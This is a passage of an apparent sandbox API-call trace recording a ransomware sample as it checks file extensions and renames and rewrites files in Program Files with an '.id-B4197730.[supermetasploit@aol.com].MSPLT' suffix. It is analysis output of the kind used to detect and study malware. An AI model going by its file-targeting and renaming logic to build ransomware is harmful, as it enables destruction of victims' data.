93 [0296.599] lstrlenW (lpString=".1cd") returned 4 [0296.600] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll") returned 93 [0296.600] lstrlenW (lpString=".jpg") returned 4 [0296.600] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.600] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.600] lstrlenW (lpString="api-ms-win-core-xstate-l2-1-0.dll") returned 33 [0296.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0296.600] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=11616) returned 1 [0296.601] CloseHandle (hObject=0x488) returned 1 [0296.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll")) returned 0x20 [0296.601] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.601] lstrlenW (lpString=".doc") returned 4 [0296.601] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.601] lstrlenW (lpString=".docx") returned 5 [0296.601] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.601] lstrlenW (lpString=".pdf") returned 4 [0296.601] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.601] lstrlenW (lpString=".xls") returned 4 [0296.601] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.601] lstrlenW (lpString=".xlsx") returned 5 [0296.602] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.602] lstrlenW (lpString=".ppt") returned 4 [0296.602] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.602] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.602] lstrlenW (lpString=".zip") returned 4 [0296.602] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.602] lstrlenW (lpString=".rar") returned 4 [0296.602] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.602] lstrlenW (lpString=".bz2") returned 4 [0296.602] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.603] lstrlenW (lpString=".7z") returned 3 [0296.603] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.603] lstrlenW (lpString=".dbf") returned 4 [0296.603] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.603] lstrlenW (lpString=".1cd") returned 4 [0296.603] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.603] lstrlenW (lpString=".jpg") returned 4 [0296.603] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.603] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.603] lstrlenW (lpString=".doc") returned 4 [0296.603] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.603] lstrlenW (lpString=".docx") returned 5 [0296.603] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.603] lstrlenW (lpString=".pdf") returned 4 [0296.603] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.603] lstrlenW (lpString=".xls") returned 4 [0296.603] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.603] lstrlenW (lpString=".xlsx") returned 5 [0296.603] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.604] lstrlenW (lpString=".ppt") returned 4 [0296.604] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.604] lstrlenW (lpString=".zip") returned 4 [0296.604] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.604] lstrlenW (lpString=".rar") returned 4 [0296.604] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.604] lstrlenW (lpString=".bz2") returned 4 [0296.604] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.604] lstrlenW (lpString=".7z") returned 3 [0296.604] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.604] lstrlenW (lpString=".dbf") returned 4 [0296.604] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.604] lstrlenW (lpString=".1cd") returned 4 [0296.604] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.604] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-xstate-l2-1-0.dll") returned 91 [0296.604] lstrlenW (lpString=".jpg") returned 4 [0296.604] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.604] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.604] lstrlenW (lpString="api-ms-win-crt-conio-l1-1-0.dll") returned 31 [0296.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0296.605] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=19648) returned 1 [0296.605] CloseHandle (hObject=0x488) returned 1 [0296.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 0x20 [0296.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.606] lstrlenW (lpString=".doc") returned 4 [0296.606] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.606] lstrlenW (lpString=".docx") returned 5 [0296.606] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.606] lstrlenW (lpString=".pdf") returned 4 [0296.606] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.606] lstrlenW (lpString=".xls") returned 4 [0296.606] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.606] lstrlenW (lpString=".xlsx") returned 5 [0296.606] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.606] lstrlenW (lpString=".ppt") returned 4 [0296.606] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.606] lstrlenW (lpString=".zip") returned 4 [0296.606] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.606] lstrlenW (lpString=".rar") returned 4 [0296.606] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.606] lstrlenW (lpString=".bz2") returned 4 [0296.606] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.607] lstrlenW (lpString=".7z") returned 3 [0296.607] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.607] lstrlenW (lpString=".dbf") returned 4 [0296.607] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.607] lstrlenW (lpString=".1cd") returned 4 [0296.607] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.607] lstrlenW (lpString=".jpg") returned 4 [0296.607] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.607] lstrlenW (lpString=".doc") returned 4 [0296.607] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.607] lstrlenW (lpString=".docx") returned 5 [0296.607] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.607] lstrlenW (lpString=".pdf") returned 4 [0296.607] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.607] lstrlenW (lpString=".xls") returned 4 [0296.607] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.607] lstrlenW (lpString=".xlsx") returned 5 [0296.607] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.607] lstrlenW (lpString=".ppt") returned 4 [0296.607] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.608] lstrlenW (lpString=".zip") returned 4 [0296.608] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.608] lstrlenW (lpString=".rar") returned 4 [0296.608] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.608] lstrlenW (lpString=".bz2") returned 4 [0296.608] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.608] lstrlenW (lpString=".7z") returned 3 [0296.608] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.608] lstrlenW (lpString=".dbf") returned 4 [0296.608] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.608] lstrlenW (lpString=".1cd") returned 4 [0296.608] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.608] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll") returned 89 [0296.608] lstrlenW (lpString=".jpg") returned 4 [0296.608] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.608] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.608] lstrlenW (lpString="api-ms-win-crt-convert-l1-1-0.dll") returned 33 [0296.608] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0296.609] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=22720) returned 1 [0296.609] CloseHandle (hObject=0x488) returned 1 [0296.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x20 [0296.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.609] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.610] lstrlenW (lpString=".doc") returned 4 [0296.610] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.610] lstrlenW (lpString=".docx") returned 5 [0296.610] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.610] lstrlenW (lpString=".pdf") returned 4 [0296.610] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.610] lstrlenW (lpString=".xls") returned 4 [0296.610] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.610] lstrlenW (lpString=".xlsx") returned 5 [0296.610] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.610] lstrlenW (lpString=".ppt") returned 4 [0296.610] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.610] lstrlenW (lpString=".zip") returned 4 [0296.610] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.610] lstrlenW (lpString=".rar") returned 4 [0296.610] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.610] lstrlenW (lpString=".bz2") returned 4 [0296.610] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.610] lstrlenW (lpString=".7z") returned 3 [0296.610] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.611] lstrlenW (lpString=".dbf") returned 4 [0296.611] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.611] lstrlenW (lpString=".1cd") returned 4 [0296.611] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.611] lstrlenW (lpString=".jpg") returned 4 [0296.611] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.611] lstrlenW (lpString=".doc") returned 4 [0296.611] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.611] lstrlenW (lpString=".docx") returned 5 [0296.611] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.611] lstrlenW (lpString=".pdf") returned 4 [0296.611] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.611] lstrlenW (lpString=".xls") returned 4 [0296.611] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.611] lstrlenW (lpString=".xlsx") returned 5 [0296.611] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.611] lstrlenW (lpString=".ppt") returned 4 [0296.611] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.611] lstrlenW (lpString=".zip") returned 4 [0296.611] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.611] lstrlenW (lpString=".rar") returned 4 [0296.612] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.612] lstrlenW (lpString=".bz2") returned 4 [0296.612] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.612] lstrlenW (lpString=".7z") returned 3 [0296.612] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.612] lstrlenW (lpString=".dbf") returned 4 [0296.612] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.612] lstrlenW (lpString=".1cd") returned 4 [0296.612] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0296.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 91 [0296.612] lstrlenW (lpString=".jpg") returned 4 [0296.612] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0296.612] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0296.612] lstrlenW (lpString="api-ms-win-crt-environment-l1-1-0.dll") returned 37 [0296.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0296.614] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=19136) returned 1 [0296.614] CloseHandle (hObject=0x488) returned 1 [0296.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll")) returned 0x20 [0296.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0296.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0296.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 95 [0296.614] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 95 [0296.614] lstrlenW (lpString=".doc") returned 4 [0296.615] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0296.615] lstrlenW (lpString=".docx") returned 5 [0296.615] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0296.615] lstrlenW (lpString=".pdf") returned 4 [0296.615] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0296.615] lstrlenW (lpString=".xls") returned 4 [0296.615] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0296.615] lstrlenW (lpString=".xlsx") returned 5 [0296.615] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0296.615] lstrlenW (lpString=".ppt") returned 4 [0296.615] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0296.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 95 [0296.615] lstrlenW (lpString=".zip") returned 4 [0296.615] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0296.615] lstrlenW (lpString=".rar") returned 4 [0296.615] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0296.615] lstrlenW (lpString=".bz2") returned 4 [0296.615] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0296.615] lstrlenW (lpString=".7z") returned 3 [0296.615] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0296.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 95 [0296.615] lstrlenW (lpString=".dbf") returned 4 [0296.615] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0296.622] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0296.623] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jfxwebkit.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.978] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=8809536) returned 1 [0297.978] CloseHandle (hObject=0x378) returned 1 [0297.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll")) returned 0x20 [0297.979] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0297.979] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jvm.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0297.993] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.993] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0297.994] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\COPYRIGHT.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\copyright.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0297.994] GetLastError () returned 0x0 [0297.995] ReadFile (in: hFile=0x378, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xcac, lpOverlapped=0x0) returned 1 [0297.997] WriteFile (in: hFile=0x47c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | 